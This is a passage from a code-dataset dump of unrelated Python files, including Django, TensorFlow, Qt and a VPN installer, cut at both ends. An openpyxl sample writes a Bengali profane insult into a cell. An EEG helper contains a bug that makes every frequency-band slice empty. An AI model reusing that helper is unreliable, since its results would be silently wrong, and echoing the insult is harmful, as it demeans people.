page_actions.click_button_with_Wait(driver,wait,\"Alerts_window_popup_modal\",\"Facebook_Like_button_xpath\")\n\n def switch_to_facebook_window(self):\n windows = page_actions.get_all_open_windows(driver)\n abc = driver.current_window_handle\n for win in windows:\n driver.switch_to.window(win)\n if str(driver.current_url) == str(configRead.locatorRead(\"Alerts_window_popup_modal\",\"Facebook_url\")):\n alerts_n_modals_Assersions.assert_facebook_title(driver)\n driver.switch_to.window(abc)\n driver.close()\n\n\n\n\n","repo_name":"aashishdalmiapython/Jenkin_SampleProject2","sub_path":"Pages/alert_n_modals_Page.py","file_name":"alert_n_modals_Page.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27128051514","text":"from django.urls import path\nfrom .views import capture_image, attendance, train_model, add_new, current_user, UserList , save_event, search\n\nurlpatterns = [\n path('current_user/', current_user),\n path('users/', UserList.as_view()),\n path('capture_image/', capture_image),\n path('attendance_record/',attendance),\n path('add_new/', add_new),\n path('train_model/',train_model),\n path('save_event/',save_event),\n path('search/',search),\n]","repo_name":"parva99/Face-Recognition-Attendance-Sysytem","sub_path":"authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44346413230","text":"import pydot\nfrom itertools import chain\nimport tensorflow as tf\nimport numpy as np\n\ndef visualize(filepath = None, all_ops = None, multilocation_ops = []):\n dot = pydot.Dot()\n dot.set('rankdir', 'UD')\n dot.set('concentrate', True)\n dot.set_node_defaults(shape='record')\n if all_ops is None:\n all_ops = tf.get_default_graph().get_operations()\n\n # eval all const tensor in \"CPU\" session\n with tf.Session() as sess:\n const_values = {}\n const_tensors = [c_op.outputs[0] for c_op in all_ops if c_op.type == \"Const\"]\n values = sess.run(const_tensors)\n 
for t, v in zip(const_tensors, values):\n const_values[t.name] = v\n\n # variable is not an OP but OP may read from it\n for var in tf.global_variables():\n node = pydot.Node(name = var.name,\n label=\"variable\",\n tooltip= var.name,\n margin = '\"0,0\"', width = \"0\", height = \"0\", style = '\"filled\"',\n fillcolor = \"brown1\")\n dot.add_node(node)\n\n all_tensors = [k for k in set(chain(\n *[c_op.outputs for c_op in all_ops],\n *[c_op.inputs for c_op in all_ops],\n ))]\n simple_const_op = []\n for c_node in all_tensors:\n # variable/read is not in all_ops\n if c_node.op not in all_ops: all_ops.append(c_node.op)\n label = c_node.op.type\n tooltip = \"{}\".format(c_node.op)\n tooltip = tooltip.replace('\"',\"'\")\n color = \"cyan\"\n if c_node.name in const_values:\n val = const_values[c_node.name]\n cnt = np.prod(val.shape)\n is_int = np.issubdtype(val.dtype, np.integer)\n if (cnt <= 8 and is_int) or (cnt == 1):\n if is_int:\n label = '\"{}\"'.format(\",\".join([\"{}\".format(v) for v in val.flatten()]))\n else:\n label = '\"{}\"'.format(\",\".join([\"{:.2f}\".format(v) for v in val.flatten()]))\n tooltip = np.array_repr(val, 100)\n color = \"gray88\"\n simple_const_op.append(c_node.op.name)\n else:\n vstr = np.array_repr(val, 100, 3).split('\\n')\n if len(vstr) > 32:\n vstr = [*vstr[:30],\"...\\n\",vstr[-1]]\n tooltip = \"\\n\".join(vstr)\n \n shape = \"box\"\n if c_node.op.name in multilocation_ops:\n shape = \"cds\"\n color = \"cyan3\"\n \n node = pydot.Node(name = c_node.op.name,\n label=label,\n tooltip=tooltip,\n margin = '\"0,0\"', width = \"0\", height = \"0\", style = '\"filled,rounded\"',shape=shape,\n fillcolor = color)\n dot.add_node(node)\n\n multilocation_id = [0 for _ in multilocation_ops]\n for c_op in all_ops:\n for io, c_output in enumerate(c_op.outputs):\n for ii, c_input in enumerate(c_op.inputs):\n label = []\n if c_input.op.name in simple_const_op:\n pass\n else:\n if len(c_input.shape) > 0:\n label.append(\"{}\".format(c_input.shape))\n if c_input.dtype.name != \"float32\":\n label.append(\"{}\".format(c_input.dtype.name))\n src_name = c_input.op.name\n \n if src_name in multilocation_ops:\n k = multilocation_ops.index(src_name)\n src_id = multilocation_id[k]\n multilocation_id[k] += 1\n src_name = \"{}[{}]\".format(src_name, src_id)\n node = pydot.Node(name = src_name,\n label=c_input.op.type,\n tooltip=tooltip,\n margin = '\"0,0\"', width = \"0\", height = \"0\", style = '\"filled,rounded\"',\n shape = \"cds\",\n fillcolor = color)\n dot.add_node(node)\n \n dot.add_edge(pydot.Edge(\n src_name,\n c_output.op.name,\n label=\"\\n\".join(label),\n fontsize=\"10\",\n labeltooltip=\"\"))\n dot_src = dot.create(\"dot\", \"svg\", encoding=\"utf-8\")\n if isinstance(dot_src, bytes):\n dot_src = dot_src.decode('utf-8')\n import dot_svg_html\n dot_svg_html.dot_to_html(dot_src, filepath)\n return dot\n","repo_name":"usstq/NN-runtimes","sub_path":"OpenVINO/tfgraph_viewer.py","file_name":"tfgraph_viewer.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40360882437","text":"import openpyxl\r\n\r\n#creating a Workbook object\r\nwb=openpyxl.Workbook()\r\n\r\n'''\r\nwb.active\r\n'''\r\n\r\n#creating sheet\r\nws1 = wb.create_sheet(\"Mysheet\",0)\r\n\r\n'''\r\nprint(wb.sheetnames)\r\n'''\r\n#Addind value in row column value format\r\nfor i in range(1,101):\r\n\tfor j in range(1,101):\r\n\t\tws1.cell(row=i, column=j,value=i)\r\n\r\n#Adding data in range 
format\r\nws1[\"A1\"]=\"khankir chele\"\t\t\r\n\r\n#saving a workbook\r\nwb.save('balances.xlsx')\r\n\r\n","repo_name":"pogo420/Python_Basics","sub_path":"old_code/excel001.py","file_name":"excel001.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9308318672","text":"\ndef algorithm_nearest(curr_ts, prev_ts, prev_msg, next_ts, next_msg):\n if curr_ts - prev_ts <= next_ts - curr_ts:\n return prev_msg\n else:\n return next_msg\n\n\ndef always_return_something(f):\n def wrapper(curr_ts, prev_ts, prev_msg, next_ts, next_msg):\n if prev_ts is None:\n return next_msg\n if next_ts is None:\n return prev_msg\n return f(curr_ts, prev_ts, prev_msg, next_ts, next_msg)\n return wrapper\n\n\nALGORITHMS = {\n 'previous': lambda ct, pt, pm, nt, nm: pm,\n 'next': lambda ct, pt, pm, nt, nm: nm,\n 'nearest': always_return_something(algorithm_nearest),\n 'exact': lambda ct, pt, pm, nt, nm: None,\n}\n\n\ndef align(target_iterator, *other_iterators, **options):\n # prepare parameters\n default_alg = options.get('algorithm', 'nearest')\n other_iterators = [\n it if isinstance(it, tuple) else (it, default_alg)\n for it in other_iterators\n ]\n\n # prepare last_infos\n last_infos = []\n for it, alg in other_iterators:\n msg = next(it, None)\n ts = msg[0] if msg is not None else None\n last_infos.append((ts, msg, None, None))\n\n # main iterator\n for target_msg in target_iterator:\n target_ts = target_msg[0]\n res = [target_msg]\n\n for idx, (it, alg) in enumerate(other_iterators):\n # make sure last_two_ts <= target_ts <= last_one_ts unless one is None\n last_one_ts, last_one_msg, last_two_ts, last_two_msg = last_infos[idx]\n\n while last_one_ts and last_one_ts < target_ts:\n last_two_ts, last_two_msg = last_one_ts, last_one_msg\n last_one_msg = next(it, None)\n last_one_ts = last_one_msg[0] if last_one_msg is not None else None\n last_infos[idx] = (last_one_ts, last_one_msg,\n last_two_ts, last_two_msg)\n\n # exactly the same! 
this is the eager case for 'previous' algorithm\n if last_one_ts == target_ts:\n res.append(last_one_msg)\n\n # use the algorithm\n else:\n assert (last_two_ts or 0) < target_ts < (last_one_ts or 1e99)\n res.append(ALGORITHMS[alg](target_ts, last_two_ts,\n last_two_msg, last_one_ts,\n last_one_msg))\n yield res\n","repo_name":"Jyb-mouse/cam2imu","sub_path":"aligner.py","file_name":"aligner.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"728348408","text":"from sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n \nclass User(Base):\n __tablename__ = 'users'\n id = Column(Integer, primary_key=True)\n username = Column(String(50), unique=True, nullable=False)\n email = Column(String(120), unique=True, nullable=False)\n password = Column(String(128), nullable=False)\n name = Column(String)\n age = Column(Integer)\n gender = Column(String)\n \n def to_dict(self):\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n \nclass Record(Base):\n __tablename__ = 'records'\n index = Column(Integer,primary_key=True)\n relative_path = Column(String)\n output = Column(Integer)\n emotion = Column(String)\n user_id = Column(Integer)\n \n def to_dict(self):\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n \n\n","repo_name":"dunkdink/thaiser-backend","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20352078644","text":"import sys\n\ninput = sys.stdin.readline\n\nif __name__ == '__main__':\n pairDic = {}\n for i in range(1, 13):\n for j in range(i + 1, 13):\n sum = i + j\n if sum in pairDic:\n pairDic[sum].append((i, j))\n else:\n pairDic[sum] = [(i, j)]\n n = int(input())\n for _ in range(n):\n want = int(input())\n output = []\n print(f'Pairs for {want}: ', end='')\n if want in pairDic:\n for item in pairDic.get(want):\n output.append(f'{item[0]} {item[1]}')\n print(', '.join(output))\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/5217/5217.py","file_name":"5217.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41624353804","text":"import re\n\ndef validar_respuesta(patron_re : str, texto : str )-> str | int:\n '''\n valida si un texto conincide con el patron\n Recibe: un texto a evaluar y un patron regex\n devuelve un int\n '''\n if(texto):\n if(re.match(patron_re, texto)):\n return texto\n return -1\n else:\n return -1\n \ncadena = \"5555\"\n\nrespuesta_de_ordenamiento = validar_respuesta(r\"^a[s]c$|^d[e][s]c$\", cadena)\nprint(respuesta_de_ordenamiento)\n","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"D_SIMULACRO_PARCIAL_clase10/capturas_e_info/validar_asc_des.py","file_name":"validar_asc_des.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27966688606","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n# for _ in range(one()):\n# a,b,c=wow()\n# print(min(a,b,c))\n\n# import math\n# for index in range(1,one()+1):\n# r,x,y = wow()\n# cnt = 0\n# for _ in range(r):\n# d,price 
= wow()\n# answer = math.ceil(d/x)\n# if answer <=y:\n# cnt+=price\n# if index != 1:\n# print()\n# print(f\"Data Set {index}:\")\n# print(cnt)\n\n# l = one()\n# a = inputing()\n# b = inputing()\n# cnt = 0\n# for x,y in zip(a,b):\n# if x != y:\n# cnt+=1\n# print(cnt)\n\n\n\n \n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/9월/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24105879450","text":"from django import forms\nfrom .models import Tag \n\nclass TodoForm(forms.Form):\n text = forms.CharField(max_length=40, \n widget=forms.TextInput(\n attrs = {\n 'class' : 'form-control',\n 'placeholder' : 'I\\'ll do This today ',\n 'aria-label' : 'Todo',\n 'aria-describedby' : 'add-btn'\n }))\n tags = forms.ModelMultipleChoiceField(queryset=Tag.objects.all(), required=False)","repo_name":"gutalavijay1111/ToDo-App","sub_path":"todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73809860329","text":"import shutil\nimport os\nfrom pathlib import Path\n\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QFileDialog\n\nfrom parsec.core.local_device import (\n list_available_devices,\n AvailableDevice,\n load_device_file,\n get_devices_dir,\n)\n\nfrom parsec.core.gui.ui.keys_widget import Ui_KeysWidget\nfrom parsec.core.gui.ui.key_widget import Ui_KeyWidget\nfrom parsec.core.gui.custom_dialogs import show_error, ask_question\nfrom parsec.core.gui.lang import translate\n\n\nclass KeyWidget(QWidget, Ui_KeyWidget):\n export_clicked = pyqtSignal(AvailableDevice)\n\n def __init__(self, device, parent=None):\n super().__init__(parent=parent)\n self.device = device\n self.setupUi(self)\n self.label_org.setText(device.organization_id)\n self.label_device.setText(device.device_label)\n self.label_user.setText(device.human_handle.label)\n self.export_button.clicked.connect(self._on_export)\n\n def _on_export(self):\n self.export_clicked.emit(self.device)\n\n\nclass KeysWidget(QWidget, Ui_KeysWidget):\n key_imported = pyqtSignal()\n\n def __init__(self, config, parent):\n super().__init__(parent=parent)\n self.config = config\n self.setupUi(self)\n self.reload_devices()\n self.button_import_key.clicked.connect(self._on_import_key)\n\n def reload_devices(self):\n layout = self.scroll_content.layout()\n for _ in range(layout.count()):\n item = self.scroll_content.layout().takeAt(0)\n layout.removeItem(item)\n w = item.widget()\n if w is not None:\n w.setParent(None)\n devices = list_available_devices(self.config.config_dir)\n for device in devices:\n w = KeyWidget(device, parent=self)\n w.export_clicked.connect(self._on_export_key)\n self.scroll_content.layout().insertWidget(self.scroll_content.layout().count() - 1, w)\n\n def _overwrite_key(self, dest):\n if dest.exists():\n rep = ask_question(\n parent=self,\n title=translate(\"ASK_OVERWRITE_KEY\"),\n message=translate(\"TEXT_OVERWRITE_KEY\"),\n button_texts=(translate(\"ACTION_OVERWRITE_KEY_YES\"), translate(\"ACTION_IMPORT_NO\")),\n )\n return rep == translate(\"ACTION_OVERWRITE_KEY_YES\")\n return True\n\n def _on_export_key(self, device):\n default_key_name = f\"parsec-{device.organization_id}-{device.human_handle.label}-{device.device_label}.keys\"\n key_path, _ = QFileDialog.getSaveFileName(\n self,\n translate(\"TEXT_EXPORT_KEY\"),\n 
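# start the save dialog at a default key filename in the user's home directory\n            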
str(Path.home().joinpath(default_key_name)),\n filter=translate(\"IMPORT_KEY_FILTERS\"),\n initialFilter=translate(\"IMPORT_KEY_INITIAL_FILTER\"),\n )\n if not key_path:\n return\n keys_dest = Path(key_path)\n try:\n shutil.copyfile(device.key_file_path, keys_dest)\n except IOError as err:\n show_error(self, translate(\"EXPORT_KEY_ERROR\"), err)\n\n def _on_import_key(self):\n key_file, _ = QFileDialog.getOpenFileName(\n parent=self,\n caption=translate(\"ACTION_IMPORT_KEY\"),\n filter=translate(\"IMPORT_KEY_FILTERS\"),\n initialFilter=translate(\"IMPORT_KEY_INITIAL_FILTER\"),\n )\n if not key_file:\n return\n new_device = load_device_file(Path(key_file))\n if new_device is None:\n show_error(self, translate(\"TEXT_INVALID_DEVICE_KEY\"))\n return\n rep = ask_question(\n parent=self,\n title=translate(\"ASK_IMPORT_KEY\"),\n message=translate(\"TEXT_IMPORT_KEY_CONFIRM_organization-user-device\").format(\n organization=new_device.organization_id,\n user=new_device.short_user_display,\n device=new_device.device_label,\n ),\n button_texts=(translate(\"ACTION_IMPORT_YES\"), translate(\"ACTION_IMPORT_NO\")),\n )\n if rep == translate(\"ACTION_IMPORT_YES\"):\n key_name = new_device.slughash + \".keys\"\n dest = get_devices_dir(self.config.config_dir).joinpath(key_name)\n if self._overwrite_key(dest):\n\n shutil.copyfile(\n new_device.key_file_path,\n os.path.join(get_devices_dir(self.config.config_dir), key_name),\n )\n self.reload_devices()\n self.key_imported.emit()\n","repo_name":"groumage/Parsec-TowardAMoreSecureCloud","sub_path":"parsec/core/gui/keys_widget.py","file_name":"keys_widget.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8516371855","text":"a1 = int(input()) # in [65… 89]\na2 = int(input()) # in [66… 91]\nn = int(input()) # in [1… 10]\n\nfor symbol_1 in range(a1, a2):\n if symbol_1 % 2 == 0:\n continue\n for symbol_2 in range(1, n):\n for symbol_3 in range(1, n // 2):\n if (symbol_1 + symbol_2 + symbol_3) % 2 != 0:\n print(f\"{chr(symbol_1)}-{symbol_2}{symbol_3}{symbol_1}\")\n","repo_name":"SimeonChifligarov/SoftUni_as_Lecturer","sub_path":"Python_Courses/Python_Basics/Preparation_PB_Exams/03_PB_Exam_15_16_June_2019/06_Movie_Tickets.py","file_name":"06_Movie_Tickets.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71655213287","text":"from scipy import signal\n\n# Absolute path of .current script\n#script_pos = os.path.dirname(os.path.abspath(__file__))\n\ndef get_index_band(rate,lower,upper):\n lower_index=int(lower*rate)\n upper_index=int(lower*rate)\n return[lower_index,upper_index]\n\n\ndef get_power_spectrum(X,y,channel,fs=250):\n #X=data.X\n #X=data.X[0][0,:]\n #data.X.shape=>(751, 19, 5000)\n #data.X[0][0,:].shape\n total_sample_number=X.shape[0]\n points_per_signal=X.shape[2]\n sample_holder=np.empty((1,1), dtype=float)\n for sample_number in range(0,total_sample_number):\n data_channel_holder=np.empty((1), dtype=float)\n for each_channel in range(0,channel):\n each_signal=X[sample_number,each_channel,:]\n f, Pxx_den = signal.periodogram(each_signal, fs,scaling=\"spectrum\")\n rate_equi=(points_per_signal/fs)\n #delta power 0-4Hz\n indexs=get_index_band(rate_equi,0,4)\n delta_power=Pxx_den[indexs[0]:indexs[1]]\n #theta power 4-7hz\n indexs=get_index_band(rate_equi,4,8)\n theta_power=Pxx_den[indexs[0]:indexs[1]]\n #Alpha power 8-15hz\n 
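#get_index_band maps Hz bounds to spectrum indices using rate_equi\n            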
indexs=get_index_band(rate_equi,8,16)\n alpha_power=Pxx_den[indexs[0]:indexs[1]]\n #beta power 16-31hz\n indexs=get_index_band(rate_equi,16,32)\n beta_power=Pxx_den[indexs[0]:indexs[1]]\n #gamma power 16-31hz\n #indexs=get_index_band(rate_equi,32,32)\n #gamma_power=Pxx_den[indexs[0]:indexs[1]]\n data_channel_holder=np.hstack([data_channel_holder,delta_power,theta_power,alpha_power,beta_power])\n sample_holder=np.vstack([sample_holder,data_channel_holder])\n return sample_holder","repo_name":"gariciodaro/eeg_master","sub_path":"Auxiliar/CommonHelper.py","file_name":"CommonHelper.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29965503864","text":"class Node:\n def __init__(self):\n self.n = 0\n self.e = ''\n\nclass Queue:\n def __init__(self):\n self.first = 0\n \n def add(self, newElement):\n newNode = Node()\n newNode.e = newElement\n if self.first != 0:\n newNode.n = self.first\n self.first = newNode\n \n def remove(self):\n nodeToBeRemoved = self.first\n self.first = nodeToBeRemoved.n\n return nodeToBeRemoved.e\n \n def isNotEmpty(self):\n return self.first != 0\n\n def getSmaller(self):\n if self.first.n == 0:\n actualNode = 0\n else:\n actualNode = self.first.n\n\n smallerElement = self.first.e\n\n while actualNode != 0:\n if smallerElement > actualNode.e:\n smallerElement = actualNode.e\n actualNode = actualNode.n\n return smallerElement\n\nq = Queue()\nq.add(\"C\")\nq.add(\"A\")\nq.add(\"B\")\nprint(q.isNotEmpty())\nprint(q.getSmaller())","repo_name":"Charlietzu/programming-languages","sub_path":"lista05/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9117928482","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Dict, List, Union\n\n\n@dataclass\nclass Term:\n text: str\n classes: str\n is_regex: bool\n flags: str\n\n\nTermsDict = Dict[str, List[Union[str, dict]]]\n\n\ndef terms_dict_to_list(terms_dict: TermsDict) -> list[Term]:\n \"\"\"Collect terms from the config's `terms` dict into a list\"\"\"\n terms: list[Term] = []\n for classes, term_list in terms_dict.items():\n for term_obj in term_list:\n if isinstance(term_obj, str):\n terms.append(Term(term_obj, classes, False, \"\"))\n else:\n terms.append(\n Term(\n term_obj[\"pattern\"],\n classes,\n True,\n term_obj.get(\"flags\", \"\"),\n )\n )\n return terms\n\n\ndef normalize_classes(classes: str) -> str:\n return \" \".join(sorted(klass.lower() for klass in classes.split()))\n\n\ndef terms_list_to_dict(terms: list[Term]) -> TermsDict:\n terms_dict: TermsDict = {}\n for term in terms:\n classes = normalize_classes(term.classes)\n terms_dict.setdefault(classes, [])\n if term.is_regex:\n terms_dict[classes].append({\"pattern\": term.text, \"flags\": term.flags})\n else:\n terms_dict[classes].append(term.text)\n return terms_dict\n","repo_name":"abdnh/anki-editor-highlighter","sub_path":"src/terms.py","file_name":"terms.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32687560490","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport time\nimport traceback\n\nimport coloredlogs\n\nfrom ebstall.deployers import dnsmasq\nfrom ebstall.deployers import nginx\nfrom ebstall.deployers import openvpn\nfrom ebstall.deployers 
import php\nfrom ebstall.deployers import supervisord\nfrom ebstall.deployers import vpnauth\nfrom ebstall.deployers import pspace_web\nfrom ebstall.deployers import nextcloud\nfrom ebstall.deployers import ejabberd\n\nimport errors\nimport util\nfrom cli import Installer\nfrom core import Core\n\nlogger = logging.getLogger(__name__)\ncoloredlogs.install(level=logging.ERROR)\n\n\nclass VpnInstaller(Installer):\n \"\"\"\n Extended installer - with VPN.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Init core\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n Installer.__init__(self, *args, **kwargs)\n self.full_reinstall = True\n\n self.ovpn = None\n self.dnsmasq = None\n self.nginx = None\n self.supervisord = None\n self.vpnauth = None\n self.php = None\n self.pspace_web = None\n self.nextcloud = None\n self.ejabberd = None\n\n self.vpn_keys = None, None, None\n self.vpn_crl = None\n self.vpn_client_config = None\n\n def init_argparse(self):\n \"\"\"\n Adding new VPN related arguments\n :return:\n \"\"\"\n parser = Installer.init_argparse(self)\n return parser\n\n def is_email_required(self):\n \"\"\"\n Returns true if the given scenario requires user email\n :return:\n \"\"\"\n return True\n\n def ask_for_email_reason(self, is_required=None):\n \"\"\"\n Reason why we need email - required in VPN case.\n :param is_required:\n :return:\n \"\"\"\n self.tprint('We need your email address for:\\n'\n ' a) identity verification for EnigmaBridge account \\n'\n ' b) LetsEncrypt certificate registration\\n'\n ' c) PKI setup - VPN configuration')\n self.tprint('We will send you a verification email.')\n self.tprint('Without a valid e-mail address you won\\'t be able to continue with the installation\\n')\n\n def init_install_intro_text(self):\n \"\"\"\n Shows installation intro text when installation starts.\n :return:\n \"\"\"\n self.tprint('Going to install Private Space backed by Enigma Bridge FIPS140-2 encryption service.\\n')\n\n def get_args_intro(self, parser):\n \"\"\"\n Argument parser intro text\n :return:\n \"\"\"\n parser.description = 'EnigmaBridge Private Space installer'\n\n def update_intro(self):\n \"\"\"\n Updates intro text for CLI header - adds version to it.\n :return:\n \"\"\"\n self.intro = '-'*self.get_term_width() + \\\n ('\\n Enigma Bridge Installer command line interface (v%s) \\n' % self.version) + \\\n '\\n usage - shows simple command list' + \\\n '\\n init - initializes the Private Space\\n'\n\n if self.first_run:\n self.intro += ' run this when running for the first time\\n'\n\n self.intro += '\\n More info: https://enigmabridge.com/amazonpki \\n' + \\\n '-'*self.get_term_width()\n\n def do_test_vpn_ports(self, line):\n \"\"\"Tests if VPN server ports are accessible\"\"\"\n public_ip = self.cfg_get_raw_ip()\n port = 1194\n tcp = False\n\n self.tprint('Testing IP: %s, ports %s' % (public_ip, port))\n res_value = util.test_port_routable(host=public_ip, port=port, tcp=tcp, with_server=True)\n if res_value is None:\n self.tprint('Server seems to be running, UDP scan cannot be performed')\n return\n\n self.tprint('Port %s, echo server, reachable: %s' % (port, res_value))\n\n def do_update_ejbca_install(self, line):\n \"\"\"Updates EJBCA distribution from the provisioning server\"\"\"\n self.load_base_settings()\n self.init_load_settings()\n self.init_services()\n self.ejbca.update_installation()\n\n def init_test_ports_pre_install_res(self, host=None, *args, **kwargs):\n failed_ports = Installer.init_test_ports_pre_install_res(self, host, *args, 
**kwargs)\n\n vpn_ok = util.test_port_routable(host=host, port=openvpn.OpenVpn.PORT_NUM, tcp=openvpn.OpenVpn.PORT_TCP,\n with_server=True, audit=self.audit)\n if not vpn_ok:\n failed_ports.append(util.Port(port=openvpn.OpenVpn.PORT_NUM, tcp=openvpn.OpenVpn.PORT_TCP,\n service='OpenVPN'))\n return failed_ports\n\n def init_print_intro(self):\n \"\"\"\n Prints introduction text before the installation.\n :return:\n \"\"\"\n self.tprint('')\n self.cli_separator()\n self.tprint('\\nThe installation is about to start.')\n self.tprint('During the installation we collect the following ec2 metadata for enrolment to '\n 'Enigma Bridge CloudHSM: ')\n self.tprint(' - ami-id')\n self.tprint(' - instance-id (anonymized, HMAC)')\n self.tprint(' - instance-type')\n self.tprint(' - placement (AWS region)')\n self.tprint(' - local-ipv4')\n self.tprint(' - public-ipv4')\n self.tprint(' - public-hostname')\n self.tprint('')\n self.tprint(self.wrap_term(single_string=True, max_width=80,\n text='We will send the data above with your e-mail address (if entered) '\n 'to our EnigmaBridge registration server during this initialization. '\n 'We will use it to:'))\n self.tprint(' - generate a dynamic DNS name (e.g., cambridge1.umph.io);')\n self.tprint(' - create a client account at the Enigma Bridge CloudHSM service.')\n self.tprint('')\n self.tprint(self.wrap_term(single_string=True, max_width=80,\n text='The Enigma Bridge account allows you access to secure hardware, which is used '\n 'to generate new RSA keys and use them securely to sign certificates, CRLs, '\n 'and OCSP responses.'))\n self.tprint('')\n text = 'The static DNS name allows you securely access the PKI web interface as ' \\\n 'it will have a valid browser-trusted HTTPS certificate as soon as this ' \\\n 'initialization is completed. No more manual over-ride of untrusted ' \\\n 'certificates and security exceptions in your browser. ' \\\n 'We need to communicate with a public certification authority LetsEncrypt. ' \\\n 'LetsEncrypt will verify a certificate request is genuine either by connecting ' \\\n 'to port 443 on this instance or by a DNS challenge on the domain ' \\\n 'if 443 is blocked.'\n\n self.tprint(self.wrap_term(single_string=True, max_width=80, text=text))\n self.tprint('')\n self.tprint(self.wrap_term(single_string=True, max_width=80,\n text='More details and our privacy policy can be found at: '\n 'https://enigmabridge.com/amazonpki'))\n self.tprint('')\n self.tprint('Please make sure the following ports are reachable: ')\n self.tprint(' tcp: 443, 8442, 8443, udp: 1194')\n\n self.tprint('')\n text = 'In order to continue with the installation we need your consent with the network ' \\\n 'communication the instance will be doing during the installation as outlined in' \\\n 'the description above'\n self.tprint(self.wrap_term(single_string=True, max_width=80,text=text))\n\n self.tprint('')\n\n def init_show_p12_info(self, new_p12, new_config=None):\n \"\"\"\n Informs user where to get P12 file to log into EJBCA admin panel.\n :return:\n \"\"\"\n if new_p12 is None:\n raise ValueError('P12 file is not defined')\n\n if new_config is None:\n new_config = self.config\n\n self.tprint('')\n self.tprint(self.t.underline('Please setup your computer to manage users of your Private Space'))\n time.sleep(0.5)\n\n public_hostname = self.ejbca.hostname if self.domain_is_ok else self.cfg_get_raw_hostname()\n self.tprint('\\nDownload your administration key: %s' % new_p12)\n self.tprint(' scp -i ec2-user@%s:%s .' 
% (public_hostname, new_p12))\n self.tprint_sensitive(' Password protecting the key is: %s' % self.ejbca.superadmin_pass)\n self.tprint('\\nPlease use the following page for a detailed guide how to import the key file '\n '(aka, P12 file): https://enigmabridge.com/support/aws13076')\n self.tprint('\\nOnce you download the key file AND import it to your computer browser/keychain you can '\n 'connect to the PKI/VPN admin interface:')\n\n if self.domain_is_ok:\n for domain in new_config.domains:\n self.tprint(' https://%s:%d' % (domain, self.ejbca.PORT_PUBLIC))\n else:\n self.tprint(' https://%s:%d' % (self.cfg_get_raw_hostname(), self.ejbca.PORT_PUBLIC))\n\n self.tprint('')\n txt = self.t.green('IMPORTANT') +\\\n ': We recommend using the \"Private Space\" to download your administrator key and an ' \\\n 'email with instructions will be delivered instantly (please check your spam/junk folder if' \\\n ' you can\\'t find it). Using instructions above increases flexibility for management ' \\\n 'but it also assumes expert knowledge and ability to foresee impact of your actions.'\n\n self.tprint(self.wrap_term(single_string=True, max_width=80, text=txt))\n\n self.tprint('\\n\\nPlease contact us at support@enigmabridge.com or '\n 'https://enigmabridge.freshdesk.com/helpdesk/tickets/new if you need assistance.')\n\n def init_services(self):\n \"\"\"\n Services initialization - instantiates basic services\n :return: \n \"\"\"\n Installer.init_services(self)\n\n self.ovpn = openvpn.OpenVpn(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.dnsmasq = dnsmasq.DnsMasq(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.nginx = nginx.Nginx(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.supervisord = supervisord.Supervisord(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.vpnauth = vpnauth.VpnAuth(sysconfig=self.syscfg, audit=self.audit, write_dots=True,\n supervisord=self.supervisord, mysql=self.mysql, ovpn=self.ovpn)\n self.php = php.Php(sysconfig=self.syscfg, audit=self.audit, write_dots=True)\n self.pspace_web = pspace_web.PrivSpaceWeb(sysconfig=self.syscfg, audit=self.audit, write_dots=True,\n 